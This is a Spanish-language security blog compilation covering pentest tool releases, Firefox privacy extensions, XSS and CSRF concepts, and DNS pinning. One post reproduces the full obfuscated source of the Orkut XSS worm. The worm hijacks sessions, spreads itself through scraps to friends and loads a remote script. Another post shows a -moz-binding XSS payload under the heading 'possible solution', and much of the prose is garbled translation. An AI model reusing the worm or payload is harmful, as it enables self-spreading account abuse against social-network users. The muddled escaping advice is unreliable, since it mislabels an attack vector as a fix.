Cuando hablamos con terminos Black Hat con otra persona que conoce poco de estos asuntos, a veces es un poco dificil de mantener la conversacion, ademas de que continuamente aparacen nuevos terminos referidos a un nuevo ataque. Aqui muestro 3 de los nuevos ataques evolucionados del XSS.
Cross-context Resquest Forgery
CCRF (Cross-context Resquest Forgery) es la forma generalizada del CSRF(Cross-site Request Forgery). En la notacion general del CSRF se dice que este solo aplica a tipos de ataques sitio-a-sitio, pero en realidad esto es muy diferente. Los ataques CSRF pueden ser aplicados tambien a los ataques aplicacion-a-aplicacion y algunas otras formas, yo encuentro que esta palabra en contexto es la forma mas generica de expresar la esencia del ataque.
Cross-context Scripting
Es un estilo similar a CCRF, Cross-context Scripting (XCS) es la forma generalizada del Cross-site Scripting (XSS). Algunas personas algo ignorantes en cuanto a ataques XSS, tienden a creer que estos solamente se presentan en los sitios web. Bien, en realidad estos se pueden presentar en cualquier parte. Esta categoria resume todos los ataques CCS incluyendo vulnerabilidades que afectan sitios web y otras tecnologias web basadas en el lado cliente.
Command Fixation Attacks
Existe una creciente tendencia de utilizar características de tecnologias en el lado del cliente que permiten a los atacantes ejecutar comandos sin la autorización del usuario. Entonces llamo un Command Fixation Attacks e incluso en algunos casos se introducen los parámetros de comandos, ya que los ataques son muy similares a Session Fixation Attacks, bien conocidos en el mundo la seguridad Web. En esta sección se describen numerosos casos de estudio dentro de esta categoría.
Enlace: Gnucitizen
Entradas relacionadas:
Fuera del Software Box un Linux de Escritorio es mucho mas seguro que otros. Sin embargo, este nivel de seguridad no es necesariamente alcanzar la seguridad a través de típicas tecnicas de seguridad centradas en el software. En ocasiones, los medios más fáciles para la seguridad son los que son los más fáciles de olvidar.
- Bloquear la pantalla y pedir el login para ingresar nuevamente
- Ocultar archivos y carpetas es una solución rápida
- Una buena contraseña es una obligación
- La instalacion de aplicaciones de intercambio de archivos es una pendiente resbaladiza.
- Es sabio actualizar regularmente su máquina
- La instalación de protección contra virus es realmente útil en Linux
- SELinux está ahí por una razón
- La creación de /home en una partición separada es más seguro
- El uso de un escritorio no-estándar vale su peso en oro
- Detener los servicios es lo mejor
Aca encontraras el porque estos tips de seguridad en linux y sobre el uso que debemos darle sobretodo si somos administradores de red y tenemos como obligacion brindar servicios a determinada empresa.
Un saludo y ya me cuentan de su config.
Entradas relacionadas:
Que pasaria si les dijera que pueden controlar una red completa sin ser administradores y sin password?, bien, UPnP es una arquitectura de software que nos permite compartir datos con otras computadoras dentro de una red, el investigador Petko D. Petkov ha encontrado diversas vulnerabilidades en esta arquitectura, dando como resultado el control total de la red.
Google Media Server,un gadget de escritorio que le permite compartir todos sus ordenadores portátiles / de escritorio los contenidos de los medios con todos los demás dispositivos que usted pueda tener a nivel local, como el teléfono, xbox, TV, y sospecho, hasta su nevera. Y todo ello a través de UPnP.
Todo devido a que UPnP no tiene algun mecanismo para la autentificacion con dispositivos.
Enlace: GNUCITIZEN
Entradas relacionadas:
En una conocida comunidad de foros underground, se ha publicado informacion detallada de las vulnerabilidades contenidas en el sitio web del senado de mexico el dia 9 de mayo cuando se llevo a cabo un deface.
En este documento se explican todos los pasos que se llevaron a cabo para penetrar en el sistema informatico que mantiene el sitio web.
Resulta interesante ver como hace especial enfasis en los diferentes puntos por donde pudo haber penetrado de forma facil y sencilla.
El documento lo pueden descargar desde Skydrive
NOTA
Ni el autor de este documento han tenido que ver con el hackeo a la web del senado, el documento solo especifica puntos vulnerables por donde se pudo haber penetrado.
Entradas relacionadas:
Hace un tiempo atras ya habia comentado acerca de BackTrack en su version beta y sobre sus nuevas caracteristicas, pues el dia de hoy se ha liberado la version final de esta increible herramienta de seguridad informatica, entre las nuevas caracteristicas que se han incluido y se han mejorado de la version beta, podemos apreciar las siguientes:
SAINT
Ha provisto una version funciona de SAINT para usuarios de BackTrack, la licencia es validad por 1 año.
Maltego
Los chicos de Paterva han creado una version especial de Maltego v2.0 con una licencia especial para usuarios de BackTrack.
Nessus
Tenable permitio la redistribucion de Nessus en BackTrack 3
Kernel
2.6.21.5, se ha decidido dejar la version del nucleo de BT3 y no actualizar a un nucleo nuevo, debido a que las injeccion de parches en wireless no han sido testeadas a fondo y no se queria poner en peligro la impresionante capacidad inalambrica de BT3
Herramientas
Como de costumbre, actualizado, afilida, SVN'ado y armados hasta los dientes. En esta liberacion se tienen algunas caracteristicas especiales
como spoonwep y fastrack, que son algunos de los grandiosos complementos que incorpora la version 3.
Disponibilidad
Por primera vez se distribuyen 3 versiones diferentes de BackTrack:
Version para CD
Version para USB
Version para VMWare
BackTrack 3 puede ser descargado desde aqui.
http://remote-exploit.org/backtrack_download.html
No esperes mas y happy hacking!!
Aqui estan los principales contendientes de anti-virus, firewalls, forense, detección de intrusos, y mucho más.
eSecurity Planet
Fast-track es una herramienta de testeo de penetracion automatica que viene incluida en la conocida distribucion de seguridad, backtrack 3, desarrollada en python y con el objetivo de agrupar las mejores caracteristicas que una herramienta de este tipo pueda tener.
La capacidad que tiene esta herramienta para generar testeos de forma automatica de acuerdo al objetivo es realmente sorprendente, solo hace falta ver como explota el servicio Microsoft-DS de sistemas Windows en un video demostrativo realizado por pureh@te.
Algunas caracteristicas con las que cuenta:
- Explotacion automatica utilizando Mestasploit Framework como fuente.
- Actualizacion del repositorio de exploits.
- Servicios de servidores para facilitar la conexion con el objetivo.
- Depuracion del proceso automatizado para objetivos en concreto.
- Escaneo e identificacion automatica de servicios vulnerables.
Mas info: BackTrack Forum
Esta vez Shreeraj Shah, whitehat y fundador de blueinfy ha liberado un nuevo paper en donde toca temas tan interesantes como los metodos que deben de ser implementado para encontrar algun error en una aplicacion; utilizando herramientas de su propia manufactura.
El rastreo de códigos de fuente de un aplicacion para la detección de la vulnerabilidad es un reto interesante y relativamente un problema complejo también. Hay varios problemas de seguridad que son difíciles de identificar usando pruebas blackbox y otras cuestiones se pueden identificar mediante el uso del código fuente. Cuestiones de seguridad de nivel de aplicación pueden ubicarse en la capa de lógica y es muy importante contar con el código fuente de auditoría realizado para desenterrar estas categorías de fallos.
Descargue el documento en formato PDF aquí.
Fuente: net-security
Como ya se ha comentado en varios foros y blogs, el 14 de este mes fue liberada la version beta de la distribucion BackTrack, y es sin duda una gran noticia para toda la comunidad de la seguridad informatica, ya que esta nueva version trae nuevas y mejoradas caracteristicas, entre las cuales:
- Soporte para Dual Core.
- Maxima compatibilidad con tarjetas Wireless, y inyeccion de parches siempre que sea posible.
- Scripts de configuracion de Xorg mejorados.
- Actualizado el repositorio de exploits, actualizado el framework de metasploit y dependencias.
- Arranque PXE, ultima caracteristica añadida (version USB).
- PwnSauce Instant John the Ripper Cluster caracteristica finalmente añadida. (version USB).
- Compiz con drivers ATI/Intel (version USB).
- Kernel 2.6.21.5
La instalacion de esta nueva version no es mas dificil que la de su version anterior, aunque si se tardo un poco al llegar al 81%, y sobre todo, guardo la configuracion que ya le habia hecho a algunos detalles en modo live-cd; a la version 2 de esta distro yo la tenia de uso diario, por lo cual la habia personalizado un poco y entre los paquetes que esperaba que tubiera esta nueva version son:
- Editor profesional de imagenes (The Gimp).
- Suite de herramientas ofimaticas (OpenOffice, StarOffice).
- Reproductor profesional de Audio (Amarok).
- Entorno de Desarrollo Integrado (monodevelop, kdevelop, eclipse)
Enlace: Remote-exploit.org
Descarga: http://www.remote-exploit.org/backtrack_download.html
Video de demostracion: BT 3 Teaser
Orkut es una red social (comunidad virtual) promovida por Google desde enero del 2004. La red está diseñada para permitir a sus integrantes mantener sus relaciones existentes y hacer nuevos amigos, contactos comerciales o relaciones más íntimas; de esta manera se vuelve un blanco bastante jugoso para los gusanos encargados de recolectar informacion sensible de los usuarios de esta red.
Orkut de Google fue alcanzado por un gusano del tipo XSS, el codigo fuente que podrás encontrar en la parte inferior de esta entrada. Para ser honesto, ya era hora. La tendencia a la infección de virus para redes sociales Web2.0 y otras amenazas cibernéticas seguirá aumentando durante los proximos años. Esto es seguro!. El simple hecho, es que las redes sociales reunen una gran cantidad de información personal que los atacantes pueden fácilmente cosechar para su propio beneficio.
El codigo es bastante simple y no puede traer ningun problema para saber lo que hace, Por lo tanto, esta es la razón por la cual voy a omitir la explicación:
function $(p,a,c,k,e,d) {
e=function(c) {
return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o=\\"o://k.w.p/28.z\\" 2a=\\"Q/x-2c-2d\\" 2e=\\"2g\');
r=8.1n(\'r\');r.1o=\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1C=\\"1\\" 1E=\\"1\\"></13>“;
5 a=”15.1I=1&H=”+n(q)+”&I=”+n(I)+”&K=”+n(E)+”&1T=”+8.18(”N”).O(j).P;5 3=B();
3.R(”q”,”o://k.w.p/2i.z”,C);3.12(”10-1e”,”Q/x-k-17-1b;”);
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\’s\’,j,d);V()}}};
6(!v(\’s\’)){5 d=i F;d.1d(d.1h()+11);W(\’s\’,\’0\’,d)};j=v(\’s\’);T();
‘,62,150,’|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page’.split(’|'),0,{}),1
);
author=”Rodrigo Lacerda”
El codigo tambien esta disponible en antrix.net
Fuentes y enlaces:
gnucitizen.org
wikipedia es
Samy myspace worm
La mayoria de personas bloquean sus puertas y ventanas, usan una trituradora de papel para protegerse del robo de identidad, e instalan un software antivirus en sus computadoras. Sin embargo, habitualmente navegan en Internet sin dar un segundo pensamiento de si el navegador es seguro y su información personal segura. Desafortunadamente, no es dificil para alguien con malas intenciones de usar un sitio en la Web para recopilar los datos de -- o introducir software espía a -- el equipo. Peor aún, a veces todo lo que tiene que hacer es hacer clic al azar en un sitio web para que sus datos sean obtenidos en una forma más inoportuna.
Mozilla Firefox tiene varias opciones de seguridad para ajustar a través del panel de preferencias, pero también hay más de 150 extensiones para privacidad y seguridad que se pueden añadir también. Son fáciles de instalar y de poco tiempo para establecer; algunos incluso trabajan automáticamente después de reiniciar su navegador. Vamos a echar un vistazo a algunas de las más populares y más útiles.
Una de las mejores formas de proteger su equipo es el de prevenir el uso de JavaScript del navegador en los sitios Web sin autorización. JavaScript, aunque útil para el desarrollo de sitios Web deslumbrantes, ha ganado algo de la reputación de ser un método para el ejercicio de Bad Things inocentes a los ordenadores. NoScript es una extensión que hace que cada sitio que utiliza JavaScript pedirle permiso antes de ejecutar. NoScript puede hacer que sitios pesados con JavaScripts sean ilegibles, pero ofrece una lista blanca de sitios aceptables que usted puede agregar fácilmente a con el fin de acelerar su experiencia de navegación.
Muchas personas usan Tor para ocultar sus hábitos de navegación en línea. FoxTor ofrece una forma de enmascarar y desenmascarar su navegador sobre la marcha, sin tener que comprometerse a practicar surf anónimo durante toda una sesión de navegación. Se requiere el uso de Tor y Privoxy.
Su navegador tiene registros del historial para ayudar a proporcionar una experiencia de navegación más rápida. Lamentablemente, los piratas informáticos pueden hechar una ojeada a distancia para ver dónde ha estado. La eliminación de información de los registros después de cada sesión de navegación puede llegar a ser lenta la navegacion, pero afortunadamente, hay otro camino. No elimine sus datos -- ocultela con SafeHistory.
Algunos de lo más sensible es la información que enviada a través de Internet viaja a través del correo electrónico, de modo que mucha gente prefiere enviar sus mensajes cifrados. El Gmail S/MIME extensión encripta los mensajes de Gmail, incluidos los archivos adjuntos, automáticamente, siempre que tenga el certificado digital del destinatario.
Mientras que Firefox 2 ha incorporado la protección contra el phishing, nunca perjudica tener un plan de copias de seguridad. La premisa detrás de Petname es simple: dejar notas de aviso en los sitios Web de su confianza y las notas aparecerán automáticamente cada vez que regrese. Si usted practica surf a lo que usted asume es uno de sus sitios de la lista blanca y no aparece nota de aviso, usted sabrá que algo no es correcto. Esta extensión es especialmente útil si está utilizando una versión anterior de Firefox sin protección anti-phishing.
SecurePasswordGenerator es un nombre largo para una pequeña aplicacion, que se reúne en su barra de herramientas y le ayuda a crear contraseñas únicas. La mitad de la batalla de permanecer seguro en línea es compleja y utilizando diferentes contraseñas cada vez que te registras en un sitio en la Web. Utilice esta herramienta para ayudarle a crear una contraseña única.
¿Alguna vez se preguntó si la información que se teclea en un formulario en línea que le pasa una vez que se pulse en "enviar"? Con FormFox, puede averiguarlo. Una vez que haya descargado y habilitado esta extensión, asomando el puntero del ratón sobre el campo de datos de un formulario o el cuadro de búsqueda revelará exactamente quién recibe la información que introduzca. Utilice esta extensión para comprobar un sitio web desconocido sitio Web antes de introducir su nombre, dirección, información de tarjeta de crédito y mientras hace sus compras en línea de vacaciones.
Muchas personas usan direcciones de correo electronico temporales para todo el correo electrónico de Internet para evitar el spam. Aunque el spam se considera generalmente más de un abuso que un problema de seguridad, hay ocasiones cuando una dirección desechable puede ser una opción más segura que la prestación real (en los foros de mensajes, por ejemplo). Hay servicios de correo electronico temporal para elegir; TrashMail.net esta extensión de Firefox ofrece una atractiva oferta en este servicio.
A veces es necesario para proteger su información de las miradas indiscretas de la gente que te rodea. Si está navegando en un aeropuerto o el cibercafé de la esquina, la gente que pasa puede hechar una mirada en los títulos de las pestañas que tiene abiertas. Page Title Eraser le permite ya sea poner en blanco el título y el icono en el navegador de pestañas, o sustituirlo con algo de texto de su elección.
Cuando se trata de proteger su privacidad, la última cosa que desea es un sitio en la Web que recopile sus datos sobre lo que hace mientras la visita o cuando usted haga clic en algo, ¿cuánto tiempo se visita una página, y así sucesivamente. Guardando asi su perfil. Aunque es inofensivo si un sitio realiza el seguimiento de datos sobre el tiempo necesario para leer un artículo, sobre la manera de instalar un juego de vídeo, la mayoría de la gente considera que no hay razón, un sitio Web no necesita saber nada acerca de sus hábitos de navegación, incluso si es sólo para Recoger datos para fines de marketing.
La mayoría de las extensiones y herramientas de uso común tratan de evitar que los datos de los perfiles en los motores de búsqueda caigan en las manos de los forasteros. TrackMeNot se invierte el enfoque y, de hecho, envía un montón de información para los motores de búsqueda mediante un proceso. Por supuesto, envía la mayoría de información falsa, lo que significa que su búsqueda de actividades permanecen ocultas a la vista y los motores de búsqueda no recogen de ninguna forma datos significativos de su visita.
Estas son sólo algunas de varias decenas de extensiones de privacidad y seguridad disponibles para Firefox; puedes encontrar una lista más completa en el sitio web de Mozilla. Herramientas como estas pueden hacer su experiencia de navegación más segura, pero recuerde: nada es infalible, y hackers con talento pueden todavía encontrar medios para sacar la información de su sistema si intentan lo suficiente. Siempre con cuidado.
Linux.com
Cuando alguien usa htmlentities(), lo he visto una y otra vez, espera que la filtracion de todas las variables de tipo XSS. Esto no es cierto, por supuesto, ya que la función requiere un segundo parámetro ENT_QUOTES que reemplaza a los caracteres de cita. Algunos desarrolladores ni siquiera son conscientes de que las comillas pueden llevar a XSS inyección.
Esto me lleva a mi punto, por defecto debería tener htmlentities() filtros de cotizaciones y si el desarrollador desea desactivar esta funcionalidad a su vez pueden usar el segundo parámetro.
Aquí está el código de ejemplo para toda persona utilizando htmlenitites:
<?php
htmlentities($variable, ENT_QUOTES);
?>
En el pasado he hecho este error también por supuesto de que la función de las comillas se toma en cuenta, aunque ahora no he aprendido:)
En lugar de usar htmlentities() usar htmlspecialchars() ya que se concentra en los caracteres especiales (<,>, &, ", '), por defecto, aunque se le escapan comillas dobles, pero no simples.
Ahora, acerca de la amenaza del tipo XSS, y no escapar comillas sencillas lo que realmente importa, a condición de que:
- Que la producción de contenido en un elemento html (como PCDATA). Individual o dobles no necesitan ser cubiertas entonces.
- Que la salida de contenido en el valor de un atributo, delimitado por comillas dobles. Luego sólo necesita protegerse de comillas dobles, que lo hace por defecto.
Posible Solucion:
<?php
$input = ‘\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)’;
$input = htmlspecialchars($input, ENT_QUOTES);
?>
<div style=”<?php echo $input?>”></div>
hilo: The Spanner
La seguridad es un factor muy importante en los entornos de red, pero eso es por todos sabido, la capacidad que tenga un administrador para responder ante incidentes de diversas indoles es algo que va muy de la mano con la prevencion que el dicho administrador tenga en su red y sus servidores, y es por eso que en ocasiones hay que tener claras politicas de seguridad en nuestros servidores y tener rigusos terminos de configuracion en ellos, de esta forma se podra responder ante un posible ataque, teniendo ciertas oportunidades para evitarlo.
Maligno en su blog, ha estado escribiendo una serie de articulos muy interesantes sobre el aseguramiento de servidores Apache, que van desde su instalacion, puesta en marcha, configuracion, mantenimiento y testeo, Los enlaces son los siguientes:
- Fortificando un Servidor Apache (I de IV)
- Fortificando un Servidor Apache (II de IV)
- Fortificando un Servidor Apache (III de IV)
- Fortificando un Servidor Apache (IV de IV)
El equipo de Ossec.net se complace en anunciar la disponibilidad de OSSEC HIDS versión 1,4. OSSEC es un Open Source Host-based Intrusion Detection System. Lleva a cabo análisis de registros, la comprobación de integridad, monitoreo del registro de Windows, la detección de rootkits, en tiempo real y alerta de respuesta. Se ejecuta en la mayoría de sistemas operativos, incluyendo Linux, OpenBSD, FreeBSD, MacOS, Solaris y Windows. Esta versión viene con muchas características nuevas, incluyendo:
- Soporte a la vigilancia de los registros de base de datos MySQL y PostgreSQL.
- Soporte para el almacenamiento de las alertas sobre bases de datos externas.
- Soporte para Prelude.
- Soporte a los logs de Sonicwall, ftpd de HP-UX, AIX 5,3 syslog y mucho más.
Más información: http://www.ossec.net/main/ossec-v14-released
TODO: http://www.ossec.net/announcements/v1.4-2007-10-30.txt
Download: http://Www.ossec.net/main/downloads/
Lea este artículo completo en Ossec.net
El siempre polémico Linux Security Modules (LSM) API se debate una vez más sobre el kernel de linux, y sobre su eliminación, lo que Linus Torvalds esta firmemente en contra, pero si debe permitir que los modulos de seguridad se cargen dinámicamente. Como parte de 2.6.24, Torvalds incluyo un parche para convertir LSM en una interfaz estática, sino que ha manifestado su voluntad de volver con ello. El principal problema es si hay seguridad real de los módulos que requieren la capacidad de ser cargados en tiempo de ejecución.
El debate continúa en el módulo de seguridad de Linux. La cuestión es si un módulo de seguridad debe tener la capacidad de carga en tiempo de ejecución? Desde LSM se conecta a las principales partes del espacio del kernel, un módulo cargado podría abrir una vulnerablilidad para un posible ataque.
Leer Articulo completo...
ExploitMe es un nuevo plugin para firefox que incluye un set de herramientas para el testeo de vulnerabilidades XSS y SQL Injection en aplicaciones web, este nuevo plugin ha sido desarrollado por un grupo de investigadores canadienses, para el analisis de las dos vulnerabilidades mas comunes en sitios webs.
Nishchal Bhall, fundador de Security Compass, y uno de los investigadores involucrados en la nueva herramienta de explotacion, comento que de esta manera sera mas facil el penetration testing de aplicaciones web.
Y teniendo el exploit, o la herramienta adecuada del lado del navegador es especialmente favorable cuando se detectan bugs, como XSS, que es actualmente explotado por el navegador.
Estas son otras buenas herramientas para el web app hacking disponibles de forma gratuita, como Paros Proxy, Burp Suite, y WebScarab, pero a diferencia de ExploitMe, son básicamente herramientas que emulan el navegador. "Ellos interceptan peticiones, y tienden a hacer XSS sobre la base de los datos que recopilan," Bhalla dice. "Ellos emulan un navegador, que es donde ocurrirá con la detección de problemas. ExploitMe es atado dentro del navegador. "
Leer mas:
ExploitMe: Free Firefox Plug-ins Test Web Apps
Al parecer Google a empezado a tomarse en serio la seguridad de sus aplicaciones, sobre todo despues de estar tras una llovisna de ataques, ahora han desarrollado una nueva herramienta que les permitira descubrir fallos XSS en sus aplicaciones de manera automatica, el nombre codigo de esta herramienta de Fuzzing es Lemon.
Srinath Anantharaju miembro del equipo de seguridad de Google comento en su blog la forma en como se desarrollo esta herramienta, dando principal incapie en la exposicion de las cadenas malformadas que puedan terminar en XSS a traves del analisis de las respuestas como resultado, que puedan ser la evidencia de este ataque.
De igual forma comento que Lemon es altamente personalizable para aplicaciones de Google y no tienen planes para él en el mercado en un futuro proximo.
Google ha sido testigo de una serie de graves errores XSS, algunos de los cuales incluyen una cuenta de AdWords fallo en diciembre, y el mas reciente ataque a Adsense. Que fueron divulgados públicamente y originalmente descubiertos por terceros.
La gente de Open Web Application Security Project (OWASP) estan preparando un Framework para evaluar y certificar los sitios web como seguros, en particular sobre los criterios que ellos consideran. El proyecto está todavía en marcha y no estaba listo para la primera ocasion de lanzamiento, pero el objetivo es proporcionar un marco para la certificación de seguridad de un sitio, lo que implica mucho más que el habitual escaneo de vulnerabilidades.
Varias certificaciones comerciales ya existen, incluidos los ScanAlert Hacker's Safe, y ControlScan, que indican que el sitio ha sido escaneado contra vulnerabilidades. Y el Extended Validation SSL (EV SSL), defendido por vendedores de certificados digitales como VeriSign y Cybertrust, ayudan a verificar que el sitio es legítimo.
Pero el iniciar un nuevo marco y nuevos criterios de certificacion que requieren la entrada inmediata de expertos en seguridad de aplicaciones Web, los desarrolladores Web, los sitios de venta, las empresas, e incluso las compañías de tarjetas de crédito, que en la actualidad se centran en conseguir aplicar el PCI Data Security Standard (PCI DSS). Y la adopción de una nueva norma cuestan dinero.
El proyecto OWASP es el bebé de Mark Curphey, que recientemente se a sumado a Microsoft como el jefe del grupo de Servicios de ACE en Europa. "Para los propietarios de los sitios Web es necesario un amplio consenso e impulsar un conjunto de criterios para diseñar, desarrollar, desplegar y mantener condiciones de seguridad en los sitios web", escribe Curphey en la web de OWASP. "Esta reivindicación de los criterios y el cumplimiento de la misma deben ser capaces de ser suministradas a una amplia variedad de interesados, incluidos los clientes, los reguladores y los socios comerciales."
A este proyecto aun le falta en desarrollarse tanto en los ambitos que desean adaptar como en la aceptacion de los administradores de sitios web, pero el objetivo principal es que este Framework de desarrollo se convierta en un estandar de la seguridad de aplicaciones web. Solo falta desearle suerte a OWASP y esperando que hagan el internet mas seguro para todos nosotros.
fuente: OWASP Preps Framework for Website Security Certification
Hace poco el investigador de seguridad Gareth Heyes descubrio un agujero de seguridad en el servicio de Google Adsense, en particular se trataba de un CSRF y a traves de un post en un prestigioso foro de seguridad publico la explotacion de esta vulnerabilidad.
Al dia de hoy ya ha liberado un exploit que se encarga de explotar dicha vulnerabilidad a traves de etiquetas de HTML formadas minuciosamente, esto es debido a que Google ya reconocio dicha vulnerabilidad como critica ya que permite realizar multiples clicks en las paginas de Adsense, a traves de Javascripts se logro esta utilidad.
No es sorprendente la rapidez con que Google cubrio esta vulnerabilidad, ya que al tratarse de un servicio de paga y en que una vulnerabildad ahi, puede desencadenar infinidad de casos de fraude en linea.
Heyes nos proporciona una descripcion de su descubrimiento atravez de su blog The Spanner.
Enlace del exploit
Ronald Koh y otros tipos me han pedido recientemente hacer un relato sobre DNS Pinning aka, principalmente para evitar las politicas que lo originan con el Anti DNS Pinning. Esto no es nada realmente nuevo y algunas explicaciones de esta tecnica estan escrita ya, yo pienso que es una buena idea hablar sobre esto de nuevo, principalmente por dos razones.
Primeramente, este tema es sabido que mantiene un alto grado de complexidad y solamente un muy limitado numero de individuos actualmente comprenden de que se trata. Por lo tanto atraer la atencion de la gente hacia el no seria seguramente inorportuno.
Segundo, esto no es una solucion de prueba para proteger otra vez esto y mas la gente que comprende esto sabe de que se trata, lo grabe son los cambios que podrian darse iyendo a una solucion en algun futuro. Cuatro ojos probablemente ven mejor que dos, comienzo.
La misma politica de origen en un acceso registringido implementado en los navegadores mas modernos para prevenir la carga de un script de un origen para accesar a documentos de un origen diferente en alguna busqueda. Por lo tanto, esto no es posible fijar o no tomar informacion de un origen foraneo. Sin embargo, desde hace tiempo esta medida de seguridad en primer lugar ha sido inicializada creo que por Netscape, los investigadores de seguridad tienen una significante espectacion para encontrar maneras de puentear esta restriccion. Uno de los resultados finalmente son Anti DNS Pinning y despues en Anti-Anti-Anti DNS Pinning, ambos explotando algunos otros mecanismos de seguridad de los navegadores modernos, llamado DNS Pinning.
Ahora puede sonar razonable empezar explicando que es el DNS Pinning actualmente, afortunadamente este fuera de turno es bonito y facil con un bit de la informacion no mostrada en el Sistema de Nombres de Dominios(DNS por sus siglas en ingles). Donde algunas peticiones a un website llamado como www.example.com, el navegador necesita resolver un DNS Lookup en ese dominio para tomar la direccion numerica asociada (IP) de el server de ese host la pregunta al website. EN el siguiente paso, el navegador envia una consulta a esa IP eso ultimo contiene el dominio, una pagina web especifica y otras variables para ser ultimamente retiradas de los datos de peticion.
Deja asumir las operaciones de busqueda del DNS en www.example.com proporciono la IP 111.111.111.111. Una peticion HTTP normal es enviada por el navegador a www.example.com puede parecer esto:
GET / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows; U;
Windows NT 5.1; de; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept:
*/*
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding:
gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive:
300
Connection: keep-alive
Cookie: secret authentication token 12345
Aqui es donde el DNS Pinning entrar en el juego. Como unatentativa de la proteccion otra vez Anti DNS Pinning, la cache del navegador tiene el par de hostname-a-ip hasta que la ventana del navegador se cierra, sin importar de que el actual DNS Time To Live (TTL) es puesto. Tengo visualizado un escenario donde esa proteccion de DNS Pinning otra vez falle below. En este ejemplo un atacante corre www.attacker.com apuntando a la direccion IP 222.222.222.222.
Por otra parte el tiene total acceso a la entrada del servidor DNS, que es puesto a TTL (DNS Timeout) de 1 segundo. Donde viendo ese sitio web en un navegador, Javascripts malicioso puede ser ejecutado por la peticion del navegador para conectarlo detras en 2 segundos y entonces responder con los datos devueltos a otro servidor diverso con el control del atacante.
1) El navegador del usuario se conecta con www.attacker.com y realiza sus operaciones de busqueda del DNS para esa URL que recibe 222.222.222.222 con un TTL de 1 segundo.
2) El javascripts dice al navegador que se conecte de nuevo a www.attacker.com despues de dos segundos, poco despues de que el TTL expiro.
3) Puesto que el DNS no es un valido mas largo, el navegador del usuario se conecta con el servidor del DNS para preguntar donde www.attacker.com esta localizado.
4) El servidor DNS responde con 111.111.111.111, que apunta a www.example.com
5) El navegador del usuario se conecta con 111.111.111.111 que envia una cabezera como:
GET / HTTP/1.1
Host: www.attacker.com
User-Agent: Mozilla/5.0 (Windows; U;
Windows NT 5.1; de; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
Accept:
*/*
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding:
gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive:
300
Connection: keep-alive
Ahora lo importante es notar que aqui el host se ha cambiado a www.attacker.com en de www.example.com y ademas de falta la cookie. Debido al hostname-a-ip ubicado en la cache del navegador, el DNS Pinning es prevenido en las segundas operaciones de busqueda de www.attacker.com que es porque este ataque fue condenado por fallar desde el principio.
Anti DNS Pinning
Segun lo he mencionado anteriormente, Anti DNS Pinning es contra lo que significaba el DNS Pinning para proteger - forzando al navegador a solicitar una entrada manipulada del DNS e.g. haciendolo creer otra vez que expiro su cache.
